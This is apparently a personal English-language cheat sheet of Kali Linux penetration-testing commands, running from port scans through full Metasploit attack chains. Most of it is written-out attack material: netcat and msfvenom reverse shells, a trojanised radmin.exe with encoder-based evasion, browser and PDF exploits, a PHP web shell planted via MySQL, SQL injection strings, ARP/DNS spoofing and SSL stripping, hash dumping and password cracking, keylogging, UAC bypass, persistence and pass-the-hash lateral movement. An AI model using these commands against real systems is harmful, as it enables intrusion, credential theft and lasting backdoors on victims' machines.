Progmar Marcin Załęczny


Networking commands and penetration testing in Kali Linux

Applications to download:

Nessus - security scanner
Running application daemon: /etc/init.d/nessusd start Configuration: https://kali:8834/ After first application's startup it displays an interface for creating user to log to the application. Next it displays a form for input activation key which is sent to the email submitted during registration process on the producer's webpage.
Next application makes its initialization, downloads signature database and configures the signatures. This process can take long amount of time and uses average 100% of CPU's time, so be prepared to wait quite a long.
I started the process in the late evening just before going asleep and when i woke up in the morning the application was ready for working.

mingw-w64 - provides 64-bit Windows programmes compilation in Linux environment:
Make sure that in /etc/apt/sources.list config file are available following repositories: # Regular repositories
deb sana main non-free contrib
deb sana/updates main contrib non-free
# Source repositories
deb-src sana main non-free contrib
deb-src sana/updates main contrib non-free
If not then paste them in and install application with following commands: apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64

Tests if specified port (5500) is opened on the remote machine: nc -v 5500

Tests if sending FIN packet to closed port not results in receiving RST/ACK packet: sudo nmap -sF

Tests if sending ACK packet which is not part of established session will not cause receiving response: sudo nmap -sA

Tests if specified UDP port (5500) is opened on the remote machine: sudo hping3 -2 -p 5500

Tests if sending icmp echo response for an icmp echo request that was not sent by a remote machine will not cause receiving response: sudo hping3 -1 --icmptype echo-reply

Sends one icmp echo packet to a remote host: ping -c 1

Sends an icmp echo packet without data after its header to a remote host: sudo nmap -sP or: ping -s 0

Broadcast addresses: -

TCP connect scanning of a specified machine (root privileges are not required): nmap -P0 -sT or: nmap -sT -n --max-rtt-timeout 500ms

TCP SYN scanning of a specified machine: sudo nmap -P0 -sS or (without option specifying scanning type, because TCP SYN scanning is a default one): sudo nmap -n --max-rtt-timeout 500ms

TCP FIN scanning of a specified machine: sudo nmap -P0 -sF

TCP XMAS scanning of a specified machine: sudo nmap -P0 -sX

TCP NULL scanning of a specified machine: sudo nmap -P0 -sN

TCP ACK scanning of a specified machine: sudo nmap -P0 -sA

Scans UDP ports of a specified machine: sudo nmap -P0 -sU or: sudo nmap -sU -n --max-rtt-timeout 500ms

Scans specified network for opened SSH port: sudo nmap -P0 -p 22 -sS

Detects a service version listening on a specified common port (80): sudo nmap -sV -P0 -p 80 -n

TCP SYN scanning of a specified machine ( with address as a source address using eth0 interface: sudo nmap -P0 -sS -S -e eth0

Runs netcat as a TCP server listening on port 5001. The program is awaiting for data sent by network and after receiving it dumps it on the standard output and closes down: nc -l 5001

Runs netcat as a UDP server listening on port 5002. The program is awaiting for data sent by network and after receiving it dumps it on the standard output and closes down: nc -u -l 5002

Sends a text specified after echo command to the TCP server listening on the port 5001 on the specified remote machine using nc (netcat) program: echo "To jest napis 12345" | nc 5001

Sends 10 bytes of 0xa5 to the UDP server listening on the port 5002 on the specified remote machine using nc (netcat) program: perl -e 'print "\xa5"x10' | nc -u 5002

Restarts networking service (ex. after changes made in /etc/network/interfaces file) service networking restart

Runs netcat application in server mode listening on port 1234: nc -lvtp 1234

Sends data to server listening on 1234 port on (localhost) machine: nc -vt 1234

Runs netcat as a server listening on 1234 port. Every incoming line of text is processed by shell /bin/sh and the result is send back to the client: nc -lvtp 1234 -e /bin/sh

Runs netcat as a client connecting with server listening on port 1234 of localmachine and provides to the server possibility of executing client's shell commands and obtaining results of that commands: nc -vt 127.0.01 1234 -e /bin/sh

Metasploit in Kali 2

Runs postgresql server service: systemctl start postgresql

Initializes database for metasploit: msfdb init

Runs metasploit console: msfconsole

Searches metasploit's database for exploit that takes advantage of vulnerability with specified code-number (ms08-067): msf> search ms08-067

Displays specified exploit's details: msf> info exploit/windows/smb/ms08_067_netapi

Switches metasploit console context to the specified exploit's module: msf> use windows/smb/ms08_067_netapi

Displays options necessary for running selected module/exploit: msf exploit(ms08_067_netapi)> show options

Sets value of specified option (here RHOST): msf exploit(ms08_067_netapi)> set RHOST

Displays operating systems that are vulnerable for the selected module/exploit: msf exploit(ms08_067_netapi)> show targets

Sets target operating system (the number is taken from the list generated by the "show targets" command): msf exploit(ms08_067_netapi)> set target numer

Displays payloads that are compatible with selected module/exploit: msf exploit(ms08_067_netapi)> show payloads

Runs selected exploit: exploit

Exits the meterpreter shell that was ran after successful break in to the victim system: meterpreter> exit

Selects payload of type reverse shell for the module/exploit: msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp

Exits msfconsole console: msf exploit(ms08_067_netapi)> exit

Program that generates payloads for Metasploit: msfvenom -h

Displays available payloads list: msfvenom -l payloads

Displays options available for selected payload (windows/meterpreter/reverse_tcp): msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Displays available payload formats: msfvenom --help-formats

Generates payload.exe executable that runs meterpreter shell connecting with specified host on specified port: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 --platform windows --arch x86 -f exe >payload.exe

Generates program which handles connections incoming from the victim's systems that executed payload.exe file generated above: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
The last line of snippet above creates process listening on 443 port.

Uses auxiliary scanner/smb/pipe_auditor module to display list of streams that listen on SMB server on remote machine: msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS
msf auxiliary(pipe_auditor)> exploit

Shell command that updates modules/exploits Metasploit's database: msfupdate

Displays all scripts (in /usr/share/nmap/scripts directory) belonging to 'default' category: nmap --sript-help default

Displays details on specified script (here nfs-ls): nmap --sript-help nfs-ls

Scans specified host to reveal opened ports and runs all scripts belonging to 'default' category on each of ports found: nmap -sC or (counterpart): nmap --script=default

Scans specified host to reveal opened ports and runs specified (nfs-ls) script on each of ports found: nmap --script=nfs-ls

Runs Metasploit console ang checks if on specified hosts ( i is listening ftp service and if it allows for anonymous access: msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS
msf> exploit

Checks if specified host is vulnerable for selected exploit without running the one: msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST
msf> check

Checks website on specified host for known vulnerabilities: nikto -h

Attempts to log in to the WebDAV panel on specified host using default credentials: cadaver Sends to the remote machine text.txt file: dav:/webdav/> put test.txt

Checks mail server if specified user exists: nc 25
VRFY username

Turns on ip packets forwarding on current machine (ex. and poisons arp cache of host to make it think that is now echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t
Now do the trick for to make it think that is (from now forwards packets between <=> arpspoof -i eth0 -t

Translates specified domain address to IP address: nslookup

Poisons DNS with dnsspoof command: cat hosts.txt
dnsspoof -i eth1 -f hosts.txt

Catches all network traffic between gateway and host: ettercap -Ti eth0 -M arp:remote / /

Carry SSL Stripping attack out:

  1. Run arpspoofing between victim host and default gateway
  2. iptables -t nat -A PREROUTING -p tcp-destination-port 80 -j REDIRECT -to-port8080
  3. Issue sslstrip command: sslstrip -l 8080

Generates php script that opens meterpreter shell after visiting webpage containing the script. The script opens no extra window and connects to the specified host ( on specified port number (2323): msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=2323 -f raw >meterpreter.php Runs listening process to catch connections from script described above: msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST
msf> set LPORT 2323
msf> exploit
After connection made we can query for current username: meterpreter> getuid Also we can dump password hashes of the victim windows system: meterpreter> hashdump

Make mysql to write arbitrary script onto the victim machine: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

Searching Metasploit's module/exploits database for specified system: msf> search drupal

Obtaining information about specified module/exploit: msf> info unix/webapp/php_xmlrpc_eval

Searches specified website ( and all sublinked websites with max 1-level nesting for minimum 5-length words and saves them to passwords.txt file: cewl -w passwords.txt -d 1 -m 5

Generates 7- and 8-length password dictionary. Each entry consists of A or B letters: crunch 7 8 AB

Guesses users and their passwords on specified POP3 server: hydra -L userlist.txt -P passwords.txt pop3

Guesses password of user mzaleczny on specified POP3 server: hydra -l mzaleczny -P passwords.txt pop3

In Windows operating system in c:\windows\repair directory exists following files:
sam - contains encrypted user names and hashes of their passwords
system - contains system key used to encrypt data in file above.
Actual/Production versions of files above sit in c:\windows\system32\config directory. To extract user names and their passwords run following ommands: bkhive system xpkey.txt
samdump2 sam xpkey.txt
The result of commands above (or result of command "meterpreter> hashdump" described above) save to a file "ntpasswords.txt" and issue following command to guess passwords: john ntpasswords.txt

John program can be used to guess linux user's passwords: john linux_passwords.txt -wordlist dictionary.txt

Metasploit AllPorts payload is used to make a connection on first port number that is not filtered by a firewall. To do this there are checked all ports starting from 1: msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit

Aurora exploit uses IE vulnerability to make a connection with a remote system and gain access to the system shell: msf> use explit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST
msf exploit(ms10_002_aurora)> exploit
Now when victim visits address in his IE browser, the exploit will be fired and attacker owning host will gain access to victim's OS shell.

Connects to specified session: msf exploit(ms10_002_aurora)> sessions -i SESSION_ID

Displays jobs running in background in Metasploit's console: msf exploit(ms10_002_aurora)> jobs

Kills a job of specified ID in Metasploit's console: msf exploit(ms10_002_aurora)> kill JOB_ID

Displays advanced parameters for selected module/exploit: msf exploit(ms10_002_aurora)> show advanced

Make migrate.rb script with parameter -f to be automatically executed after successful connection with victim host. It moves Meterpreter shell into newly started notepad process in the host (thanks to it we do not lose the connection after closing up hanged IE): msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
msf exploit(ms10_002_aurora)> exploit
Alternatively we can set advanced parameter "PrependMigrate" to true. It will do shell migration into newly created process yet before exploit fire.

Prepare malicious pdf and listening for callback connections: msf> use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2
Catching connections from victim hosts: msf exploit(adobe_utilprintf)> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set ExitOnSession false
We run our handler as a background process: msf exploit(handler)> exploit -j

Exploit for web browser with Java < 7 Update 11: msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST
msf exploit(java_jre17_jmxbean)> exploit

Applet exploit for web browser with Java: msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST
msf exploit(java_signed_applet)> exploit

Module recognizing web browser and applying all available exploits that might be successfull: msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)> set LHOST
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploit
Displays all sessions with active shell running at victim computers: msf auxiliary(browser_autopwn)> sessions -l

Program fo making social enginering attacks (sending malicious code in attachments to e-mails, creating phishing webpages, etc. - it is installed in Kali Linux by default): setoolkit

In Kali Linux in /usr/share/windows-binaries directory there are stored a few executables that can be used to hold malicious payloads (it may be also any other windows exe binaries). Here is how to prepare a trojan: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe Process listening for incoming connections from meterpreter shells, we run in Metasploit console by using handler module: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit

Command working as above but it it also runs 10 iterations of payload ciphering with x86/shikata_ga_nai encoder: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe

Displays list of encoders supperted by msfvenom program: msfvenom -l encoders

Multiple ciphering a payload with some different encoders: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin

Generates a payload as a text string in C language: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c >radmin.c

Generates random text string of 512 length: cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

Ciphers input.exe executable with hyperion.exe program and saves it to output.exe executable: wine hyperion.exe input.exe output.exe

Installs and runs a tftpd server in Kali Linux: apt-get install atftpd
systemctl start atftpd
Downloads plik.txt file from remote server to windows machine running cmd shell: tftp -i GET plik.txt Pobieranie pliku z maszyny z windowsem za pomocą powłoki cmd: Uploads plik.txt file from windows machine running cmd shell to remote server: tftp -i PUT plik.txt

Meterpreter scripts reside in /usr/share/metasploit-framework/scripts/meterpreter directory. To run a script issue following command: meterpreter> run script-name A script help you can obtain as below: meterpreter> run script-name -h

Displays a running in processes list: meterpreter> ps

Moves a meterpreter session into a process with id 1234: meterpreter> run migrate -p 1234

Moves a meterpreter session to run as a background job: meterpreter> background

Obtains logged users list of specified session in the system: msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit

Calling any WinAPI function for example to check if current user is an admin: msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAdmin
>> exit

Runs a bucket of exploits until to get user with SYSTEM privileges or to exhaust exploits: meterpreter> getsystem
meterpreter> getuid

Returns to previous user privileges: meterpreter> rev2self

Runs exploit for Windows XP SP2/SP3 system to leverage user privileges: msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST
msf exploit(ms11_080_afdjoinleaf)> exploit

Bypasses UAC (User Account Control) in Windows 7: msf> use exploit/windows/local/bypassuac
msf exploit(bypassuac)> set SESSIoN 1
msf exploit(bypassuac)> exploit
meterpreter> getuid
The commands above open meterpreter session with UAC disabled so the command below should work properly: meterpreter> getsystem

Enters to Linux shell within the meterpreter session (of course the Linux system should work on compromised machine): meterpreter> shell And issuing some basic commands: > whoami
> uname -a
> lsb_release -a
> udevadm --version

Searches local exploits database for udev program: /usr/share/exploitdb/searchsploit udev

Runs nc as a server listening on 12345 port: nc -lvp 12345 Connects to netcat working as above and attaches shell as a program handling standard input: nc 12345 -e /bin/bash From now within the first of the couple commands above you can issue linux shell commands that will be executed remotely:

Searches for files containing phrase password in their names from within meterpreter session: meterpreter> search -f password

Runs embedded in meterpreter key-logger: meterpreter> keyscan_start Displays catched keypresses: meterpreter> keyscan_dump Stops key-logger: meterpreter> keyscan_stop

Catching passwords stored by WinSCP application in Windows system: msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit

Displays list of users in Windows system: cmd c:\> net users

Displays list of local admins in Windows system: cmd c:\> net localgroup Administrators

After intercepting one Windows host you can try to intercept other hosts in the domain by using psexec exploit: msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit

Uses psexec module/exploit to log into a remote host knowing only hash of real password: msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit

Runs sshexec module/exploit to log into a remote Linux host: msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami

Loads incognito module to handle tokens in Windows system: msf> load incognito Lists in meterpreter shell list of available tokens: meterpreter> list_tokens -u Obtains specified user's privileges (associated to given 'COMPXP\\username' token): meterpreter> impersonate_token COMPXP\\username

Starts smb server in Windows domain environment that listens at 445 port and saves user password hashes to the /root/johnpwfile file: msf> use auxiliary/server/capture/smb
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploit
Next you can initiate smb connections with fake host from within compromised machine: meterpreter> shell
C:\windows\system32> net use \\\anything

Displays network configuration of host running meterpreter shell: meterpreter> ifconfig

Redirects all network traffic to network through session number 2 (that has connection with catched router in the same network) - it is so called pivot: msf> route add 2

Scans ports from within Metasploit shell: msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOST
msf auxiliary(tcp)> exploit

Runs in Metasploit socks4a proxy server: msf> use auxilary/server/socks4a
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploit
Now in /etc/proxychains.conf file change line: socks4 9050 to: socks4 4040 From now you can run through the pivot network programmes outside the Metasploit by using proxychains application, ex: root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445

Creates new user (martin) and assigns it to the domain in domain environment: C:\> net use martin mypassword /add /domain Assigns user created above to the Administrators group: C:\> net localgroup Administrators martin /add

Creates in catched Windows system VisualBasic script that is executed after each system start and is trying to connect to attacker's host every 10 minutes: meterpreter> run persistence -r -p 12345 -X -i 600

Runs burpsuite application: Applications -> Web Applications Analysis -> burpsuite Server proxy configuration in Firefox: Menu Edit -> Preferences -> Advanced There you switch to "Network" tab and click "Settings" button. Server proxy configuration window should be opened.

Example of injecting arbitrary code using variables processed by webapplications:' OR '1'='1&password=' OR '1'='1 or 1 in (show databases)

Automated extracting information about a database: sqlmap -u "" --dump

Attempt to obtain access to shell in that there is running SQL Server: sqlmap -u "" --os-shell The method uses SQL Server xp_cmdshell command.

All Metasploit's exploits reside in following directory: /usr/share/metasploit-framework/modules/exploits